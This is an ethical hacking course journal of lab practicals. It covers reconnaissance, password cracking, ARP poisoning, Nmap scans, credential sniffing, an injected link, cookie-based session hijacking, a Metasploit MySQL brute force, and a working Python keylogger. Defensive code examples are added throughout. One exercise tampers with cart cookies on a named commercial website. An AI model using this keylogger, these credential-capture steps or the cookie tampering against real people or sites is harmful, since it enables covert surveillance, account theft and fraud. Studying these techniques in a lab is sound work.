
Ethical Hacking Journal - Final

The document provides information from running various commands and tools for reconnaissance and attack simulation. WHOIS lookup on google.com reveals registrar details. Practicals cover using CrypTool for encryption, Cain and Abel for password cracking and ARP poisoning, network commands in Linux like ifconfig and traceroute, Nmap port scanning, Wireshark packet capture, cross-site scripting attack simulation, and session impersonation using a Firefox add-on.

Uploaded by

Saket Malik

PRACTICAL 1
Aim: Use Google and Who.is for Reconnaissance

Registrar Info
Name: MarkMonitor International Canada Ltd.
Whois Server: whois.ca.fury.ca
Referral URL: Markmonitor.com

Status:
clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
clientTransferProhibited https://icann.org/epp#clientTransferProhibited
clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
serverTransferProhibited https://icann.org/epp#serverTransferProhibited
serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited

Important Dates
Expires On: 2023-04-28
Registered On: 2000-10-04
Updated On: 2022-09-01

Name Servers
ns1.google.com 216.239.32.10
ns2.google.com 216.239.34.10
ns3.google.com 216.239.36.10
ns4.google.com 216.239.38.10
Registrar Data
We will display stored WHOIS data for up to 30 days.

Registrant Contact Information:
Name: Google Canada Corporation
Organization: Google Canada Corporation
Address: 12-111 Richmond St. W
City: Toronto
State / Province: ON
Postal Code: M5H2G4
Country: CA
Phone: +1.4162146034
Email:

Administrative Contact Information:
Name: Google Canada Corporation
Organization: Google Canada Corporation
Address: 12-111 Richmond St. W
City: Toronto
State / Province: ON
Postal Code: M5H2G4
Country: CA
Phone: +1.4162146034
Email:

Technical Contact Information:
Name: Google Canada Corporation
Organization: Google Canada Corporation
Address: 12-111 Richmond St. W
City: Toronto
State / Province: ON
Postal Code: M5H2G4
Country: CA
Phone: +1.4162146034
Email:

Billing Contact Information:
Name: Google Canada Corporation
Organization: Google Canada Corporation
Address: 12-111 Richmond St. W
City: Toronto
State / Province: ON
Postal Code: M5H2G4
Country: CA
Phone: +1.4162146034
Email:

Information Updated: 2023-01-03 01:11:22



PRACTICAL 2 A
Aim: Use CrypTool to encrypt and decrypt passwords using RC4 algorithm

Text written for encryption as shown below:

Choose Encrypt/Decrypt from the toolbar; RC4 is listed under Symmetric (modern).

Click on Encrypt and you will get the encrypted text in a new window.

Now, with this window open, go back to the RC4 window and click on Decrypt. We will get our original plain text back.
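
Decrypt returns the original text because RC4 encryption and decryption are the same operation: XOR with a keystream derived from the key. The Python below is an added example, not part of the original journal or of CrypTool; the key and messages are constructed samples, and it also shows two reasons RC4 is a poor choice for protecting passwords.

```python
def rc4_keystream(key: bytes):
    """Generate RC4 keystream bytes: key scheduling, then the output loop."""
    s = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm (KSA)
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    i = j = 0
    while True:                               # pseudo-random generation (PRGA)
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        yield s[(s[i] + s[j]) % 256]


def rc4(key: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt: both directions XOR the data with the same keystream."""
    return bytes(b ^ k for b, k in zip(data, rc4_keystream(key)))


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def demo():
    key = b"Key"                              # constructed sample key
    ct = rc4(key, b"Plaintext")               # widely published RC4 test vector
    roundtrip = rc4(key, ct)                  # "Decrypt" is the same call

    # Caveat 1: reusing a key leaks the XOR of the two plaintexts.
    p1, p2 = b"password-one", b"password-two"
    leak = xor(rc4(key, p1), rc4(key, p2)) == xor(p1, p2)

    # Caveat 2: no integrity. Flipping ciphertext bits flips the same plaintext bits.
    forged = bytearray(rc4(key, b"pay=100"))
    forged[4] ^= ord("1") ^ ord("9")
    tampered = rc4(key, bytes(forged))
    return ct.hex(), roundtrip, leak, tampered


if __name__ == "__main__":
    print(demo())
```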

PRACTICAL 2B
Aim: Use Cain and Abel for cracking Windows account password using Dictionary attack and to
decode wireless network passwords
Prerequisites :
Cain and Abel, Internet
Steps :
1. Open the software and click the Cracker tab >> Hash Calculator tool, as shown in the image.

2. A dialogue box appears after clicking Hash Calculator. Add the text >> Calculate the hash code >> Copy the MD5 hash value.

3. Click on MD5 Hashes >> Add list >> Paste the hash value.

4. Right-click the hash code, then Dictionary Attack >> Add to list (add the default wordlist or create your own containing the password) >> Start.

Match found (if the word is in the wordlist):
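
The match in step 4 is possible because an unsalted MD5 hash is fast to compute and identical for every account that shares a password. The Python below is an added example, not part of the original journal: it puts that storage scheme beside a salted, slow alternative (PBKDF2-HMAC-SHA256 from the standard library). The iteration count, record format and sample password are assumptions made for the example.

```python
import hashlib
import hmac
import os

ITERATIONS = 600_000   # assumption: work factor chosen for this example


def md5_hex(password: str) -> str:
    """Unsalted MD5, the kind of value the hash calculator in the steps produces."""
    return hashlib.md5(password.encode()).hexdigest()


def hash_password(password: str) -> str:
    """Salted, deliberately slow hash: PBKDF2-HMAC-SHA256 with a random 16-byte salt."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    _, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk, bytes.fromhex(dk_hex))


def compare_schemes(password: str = "password"):
    # Two accounts with the same password (constructed sample data).
    md5_a, md5_b = md5_hex(password), md5_hex(password)
    kdf_a, kdf_b = hash_password(password), hash_password(password)
    return {
        "md5_identical": md5_a == md5_b,      # one wordlist hash matches every account
        "kdf_identical": kdf_a == kdf_b,      # per-user salt makes each record unique
        "kdf_verifies": verify_password(password, kdf_a),
        "kdf_rejects_wrong": not verify_password("Password", kdf_a),
    }


if __name__ == "__main__":
    print(compare_schemes())
```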

PRACTICAL 3A
Aim: Run and analyze the output of following commands in Linux – ifconfig, ping, netstat,
traceroute
Prerequisites :
KALI Linux, Internet
Steps :
1) In Kali Linux, open terminal and enter ifconfig

2) Type command – traceroute 8.8.8.8



3) Type command – netstat

4) Type command – ping 8.8.8.8



PRACTICAL 3 B
Aim: Perform ARP Poisoning in Windows

Steps:
We will use Cain and Abel for ARP poisoning.
Step 1: Open Cain.

Step 2: Select the Sniffer tab at the top.

Step 3: Next to the folder icon, click the Start/Stop Sniffer icon. Select the device and click OK.

Step 4: Click the “+” icon at the top. Click OK.

Step 5: The connected hosts are shown.

Step 6: Select ARP at the bottom.

Step 7: Click the “+” icon at the top.

Step 8: Click the Start/Stop ARP icon at the top.

Step 9: Poisoning the source.

Step 10: Go to any website on the source IP address.

Step 11: Go to the Passwords option in Cain & Abel and see the password for the visited site.
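
On the defending side, the poisoning in steps 8 and 9 shows up as ARP replies that rebind an existing IP address (typically the gateway) to a different MAC, and as one MAC answering for several IPs. The Python below is an added detection example, not part of the original journal; the observation format and all addresses are constructed.

```python
from collections import defaultdict

# Constructed sample: "<seconds> <sender IP> <sender MAC>", one line per ARP reply seen.
SAMPLE = """\
10 192.168.1.1 00:11:22:33:44:55
12 192.168.1.20 aa:bb:cc:00:00:20
15 192.168.1.30 aa:bb:cc:00:00:30
40 192.168.1.1 AA:BB:CC:00:00:30
41 192.168.1.20 aa:bb:cc:00:00:30
70 192.168.1.1 aa:bb:cc:00:00:30
"""


def find_arp_anomalies(text: str):
    """Return (rebinds, multi_claims) for a stream of ARP reply observations."""
    first_mac = {}                    # ip -> MAC first seen for it (the baseline)
    ips_by_mac = defaultdict(set)     # mac -> every IP it has claimed
    rebinds = []                      # (time, ip, baseline MAC, new MAC)
    reported = set()                  # (ip, mac) pairs already alerted on
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 3 or not fields[0].isdigit():
            continue                  # skip malformed lines
        ts, ip, mac = int(fields[0]), fields[1], fields[2].lower()
        ips_by_mac[mac].add(ip)
        baseline = first_mac.setdefault(ip, mac)
        if mac != baseline and (ip, mac) not in reported:
            reported.add((ip, mac))
            rebinds.append((ts, ip, baseline, mac))
    multi_claims = {m: sorted(ips) for m, ips in ips_by_mac.items() if len(ips) > 1}
    return rebinds, multi_claims


if __name__ == "__main__":
    print(find_arp_anomalies(SAMPLE))
```

A rebind alone can be legitimate (a DHCP lease reassigned, a failover pair), so treat it as a lead to check against the switch's port and DHCP records; switch features such as Dynamic ARP Inspection enforce the same binding check in the network itself.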

PRACTICAL NO. 4
Aim: Use NMap scanner to perform port scanning of various forms – ACK, SYN, FIN, NULL,
XMAS
Prerequisites :
KALI Linux, Internet
Steps :
NOTE: To use Nmap on Kali, open a terminal and type the commands below.
1) ACK Scan (-sA) (TCP ACK scan)
It never determines open (or even open|filtered) ports. It is used to map out firewall rulesets, determining whether they are stateful or not and which ports are filtered.
Command: nmap -sA -T4 scanme.nmap.org

2) SYN (Stealth) Scan (-sS)

SYN scan is the default and most popular scan option for good reason. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by intrusive firewalls.
Command: nmap -p22,113,139 scanme.nmap.org

3) FIN Scan (-sF)

Sets just the TCP FIN bit.
Command: nmap -sF -T4 8.8.8.8

4) NULL Scan (-sN)

Does not set any bits (TCP flag header is 0)
Command: nmap -sN -p 22 scanme.nmap.org

5) XMAS Scan (-sX)

Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree.
Command: nmap -sX -T4 8.8.8.8
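
Each scan type above is defined by the flag byte of the TCP header, which is what a sensor can match on. The Python below is an added detection example, not part of the original journal and not Nmap code: it reads the flags from raw TCP headers and labels ACK, FIN, NULL and XMAS segments that belong to no flow opened with a SYN. The packets are constructed; a SYN scan starts like any other connection, so it cannot be labelled from flags alone and is left out.

```python
import struct

FIN, SYN, PSH, ACK, URG = 0x01, 0x02, 0x08, 0x10, 0x20
PROBES = {0: "NULL", FIN: "FIN", FIN | PSH | URG: "XMAS", ACK: "ACK"}


def tcp_header(sport: int, dport: int, flags: int) -> bytes:
    """Build a minimal 20-byte TCP header (used only to construct sample input)."""
    return struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 1024, 0, 0)


def classify(packets):
    """packets: (src_ip, dst_ip, tcp_header_bytes) in arrival order.

    Returns (src_ip, dst_port, label) for segments whose flag combination matches a
    probe type and that belong to no flow opened with a SYN.
    """
    opened = set()
    findings = []
    for src, dst, hdr in packets:
        if len(hdr) < 20:
            continue                              # truncated header
        sport, dport = struct.unpack("!HH", hdr[:4])
        flags = hdr[13] & 0x3F                    # low six bits: URG ACK PSH RST SYN FIN
        if flags == SYN:                          # connection attempt: remember both directions
            opened.add((src, sport, dst, dport))
            opened.add((dst, dport, src, sport))
        elif (src, sport, dst, dport) not in opened and flags in PROBES:
            findings.append((src, dport, PROBES[flags]))
    return findings


# Constructed sample traffic: one normal client, then four probes from 10.0.0.99.
SAMPLE = [
    ("10.0.0.5", "10.0.0.1", tcp_header(50000, 80, SYN)),
    ("10.0.0.1", "10.0.0.5", tcp_header(80, 50000, SYN | ACK)),
    ("10.0.0.5", "10.0.0.1", tcp_header(50000, 80, ACK)),
    ("10.0.0.99", "10.0.0.1", tcp_header(40001, 25, ACK)),
    ("10.0.0.99", "10.0.0.1", tcp_header(40002, 80, FIN)),
    ("10.0.0.99", "10.0.0.1", tcp_header(40003, 22, 0)),
    ("10.0.0.99", "10.0.0.1", tcp_header(40004, 443, FIN | PSH | URG)),
]

if __name__ == "__main__":
    print(classify(SAMPLE))
```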

PRACTICAL 5
Aim: Use Wireshark (Sniffer) to capture network traffic and analyze

Steps:

Download and install Wireshark

Go to Capture -> Options -> Select Ethernet with Traffic and click on Start

You will now start seeing the network traffic

Now go to the browser and open http://techpanda.org. This is a site with a dummy login for us to test the traffic analysis.

Log in to the website using [email protected] and Password2020

Now stop the traffic analysis by clicking the Stop Capturing Packets option at the top left corner

Now enter http in the display filter and click on the POST request with index.php

Now expand HTML Form URL Encoded to see the login credentials we posted using the HTML form on the above website

END

PRACTICAL 6
Aim: Simulate persistent cross-site scripting attack

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected
into otherwise benign and trusted websites.

Steps:

Go to the browser and open http://techpanda.org. This is a site with a dummy login for us to test the traffic analysis.

Log in to the website using [email protected] and Password2020

Now click on the Add New Contact option and, while entering the details, enter an HTML anchor tag with a link to a website as input, as shown below

Now click on Save Changes and go back to the site’s dashboard. You will see your record added, but instead of plain text you will see the hyperlink text Subiksh.

Once we click on this link, it will route to the website we mentioned in the anchor tag.
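
The stored anchor tag becomes a live link because the dashboard writes the saved field into the page as markup. The Python below is an added example, not part of the original journal and not the test site's code: it shows that rendering pattern beside output encoding, plus a link helper that allow-lists URL schemes. The function names and the stored value are assumptions modelled on the step above.

```python
import html
from urllib.parse import urlsplit


def render_row_unsafe(name: str) -> str:
    """Vulnerable: the stored value is concatenated into the page as markup."""
    return "<tr><td>" + name + "</td></tr>"


def render_row_safe(name: str) -> str:
    """Hardened: HTML-encode on output so the stored value is displayed as text."""
    return "<tr><td>" + html.escape(name, quote=True) + "</td></tr>"


def render_link(url: str, text: str) -> str:
    """When links are a feature, build the tag server-side and allow-list the scheme."""
    url = url.strip()
    if urlsplit(url).scheme.lower() not in ("http", "https"):
        return html.escape(text)                  # drop the link, keep the label
    return '<a href="{}" rel="noopener noreferrer">{}</a>'.format(
        html.escape(url, quote=True), html.escape(text))


# Constructed input modelled on the practical: an anchor tag typed into the name field.
STORED_NAME = '<a href="http://example.com">Subiksh</a>'

if __name__ == "__main__":
    print(render_row_unsafe(STORED_NAME))   # browser renders a clickable link
    print(render_row_safe(STORED_NAME))     # browser shows the tag as plain text
    print(render_link("https://example.com/?a=1&b=2", "site"))
```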

PRACTICAL 7
Aim: Session impersonation using Firefox and Tamper Data add-on

We will be using EditThisCookie Add on for Session Impersonation and Tampering the Data.

Steps:

1) Install the EditThisCookie add-on in your Firefox browser

2) Go to the browser and open http://techpanda.org. This is a site with a dummy login for us to test the traffic analysis

3) Log in to the website using [email protected] and Password2020

4) Now go to the add-on, export the cookie information and paste it into a notepad

5) Once copied, close the browser window and go to the http://techpanda.org website again. It will again ask you to log in with a new session.

6) Go to the add-on, delete the new cookie and replace it with our previously copied cookie using the Import option.

7) Now refresh the page and your previous session will be impersonated, giving you access without logging in.

For Tamper Data, follow the steps below:

1) Go to https://www.ninjaremote.com/ and click on Add to Cart for any one product.

2) Then navigate to the cart option for further processing. You can see your order with the quantity set to 1.

3) Now, using EditThisCookie, copy the cookie and paste it into your notepad. After this, edit the cookie information: set "value": "10" for p_nr1 and nTotalUnits. Save the cookie and use it to replace your existing cookie on the site.

4) Now refresh the page and your cart quantity data will be updated
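
Both exercises work because the server trusts whatever cookie the browser sends back. The Python below is an added example, not part of the original journal and not either site's code: the server signs each cookie value with an HMAC that also covers the cookie name and issue time, so an edited value, a value pasted under another name, or a cookie replayed after its lifetime is rejected. The secret, the 30-minute lifetime and the token layout are assumptions; the cookie names come from the steps above.

```python
import hashlib
import hmac
import time

SECRET = b"constructed-demo-key"     # assumption: random server-side key, never sent to clients


def _tag(name: str, value: str, issued: str) -> str:
    msg = "|".join((name, value, issued)).encode()
    return hmac.new(SECRET, msg, hashlib.sha256).hexdigest()


def sign_cookie(name: str, value: str, now: float = None) -> str:
    """Return 'value|issued|tag'; the tag binds the cookie name, value and issue time."""
    issued = str(int(time.time() if now is None else now))
    return "|".join((value, issued, _tag(name, value, issued)))


def read_cookie(name: str, cookie: str, max_age: int = 1800, now: float = None):
    """Return the value, or None if the cookie was edited, malformed or has expired."""
    try:
        value, issued, tag = cookie.rsplit("|", 2)
        age = (time.time() if now is None else now) - int(issued)
    except ValueError:
        return None
    if not hmac.compare_digest(tag.encode(), _tag(name, value, issued).encode()):
        return None
    return value if 0 <= age <= max_age else None


def demo():
    cookie = sign_cookie("nTotalUnits", "1", now=1000)
    edited = "10" + cookie[1:]                          # client changes the value 1 -> 10
    return (
        read_cookie("nTotalUnits", cookie, now=1010),   # untouched
        read_cookie("nTotalUnits", edited, now=1010),   # edited in the browser
        read_cookie("p_nr1", cookie, now=1010),         # pasted under another name
        read_cookie("nTotalUnits", cookie, now=4000),   # replayed after max_age
    )


if __name__ == "__main__":
    print(demo())
```

A signature does not stop a valid session cookie from being copied and reused within its lifetime, so session identifiers also need server-side invalidation at logout and the Secure and HttpOnly cookie attributes.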

PRACTICAL 8
Aim: Create a simple keylogger using python

Steps:
1) Run the Python file below in IDLE:

from pynput.keyboard import Key, Listener
import logging

# if no name it gets into an empty string
log_dir = ""

# This is a basic logging function
logging.basicConfig(filename=(log_dir + "key_log.txt"),
                    level=logging.DEBUG, format='%(asctime)s:%(message)s:')

# This is from the library
def on_press(key):
    logging.info(str(key))

# This says, listener is on
with Listener(on_press=on_press) as listener:
    listener.join()

2) Enter some text in the output window and open the text file to see the log of all the keyboard input.

PRACTICAL 9
Aim: Using Metasploit to exploit (Kali Linux)

Prerequisites:
KALI Linux, Internet, HOST PC with MySQL 5.1.59 version

Steps:
1) Download and install MySQL 5.1.59 on the HOST PC to be attacked. Set the username to root and the password to root123

2) On your PC, open Kali Linux in Oracle VirtualBox. Open a terminal and enter the command msfconsole

3) Now search for the mysql_login exploit using the search mysql_login command and use the auxiliary

4) Set RHOSTS to your target IP address using the command set RHOST 192.168.1.100

5) Set USER_FILE to user.txt (this file needs to contain some sample usernames to be tested in the brute-force attack; if the file has not been created, create it with the command nano user.txt, then enter a few usernames and save the file)

6) Set PASS_FILE to pass.txt (follow step 5 for this as well)

7) Run the command options to verify the settings

8) Finally, run the exploit using the run command. The output will show Success and Failed as results.
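
On the MySQL host, a run like step 8 produces a burst of "Access denied" failures from one client, usually across several usernames. The Python below is an added detection example, not part of the original journal: it counts failures per client host in a sliding time window. The "<epoch seconds> <message>" line layout, the addresses and the thresholds are constructed assumptions; only the access-denied message text follows MySQL's wording.

```python
import re
from collections import defaultdict, deque

# Constructed sample: "<epoch seconds> <message>", using MySQL's access-denied message text.
SAMPLE_LOG = "\n".join(
    [f"{1000 + i} Access denied for user '{u}'@'192.168.1.50' (using password: YES)"
     for i, u in enumerate(["root", "root", "admin", "admin", "test", "test"])]
    + ["1100 Access denied for user 'app'@'192.168.1.77' (using password: YES)",
       "1400 Access denied for user 'app'@'192.168.1.77' (using password: YES)"]
)

DENIED = re.compile(r"^(\d+) .*Access denied for user '([^']*)'@'([^']*)'")


def detect_guessing(log: str, max_failures: int = 5, window: int = 60):
    """Return {host: (most failures inside one window, usernames tried)} for noisy hosts."""
    recent = defaultdict(deque)       # host -> timestamps of failures still inside the window
    users = defaultdict(set)          # host -> usernames it has tried
    worst = defaultdict(int)          # host -> largest failure count seen in any window
    for line in log.splitlines():
        m = DENIED.match(line)
        if not m:
            continue
        ts, user, host = int(m.group(1)), m.group(2), m.group(3)
        q = recent[host]
        q.append(ts)
        while ts - q[0] > window:     # slide the window forward
            q.popleft()
        users[host].add(user)
        worst[host] = max(worst[host], len(q))
    return {h: (n, sorted(users[h])) for h, n in worst.items() if n >= max_failures}


if __name__ == "__main__":
    print(detect_guessing(SAMPLE_LOG))
```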
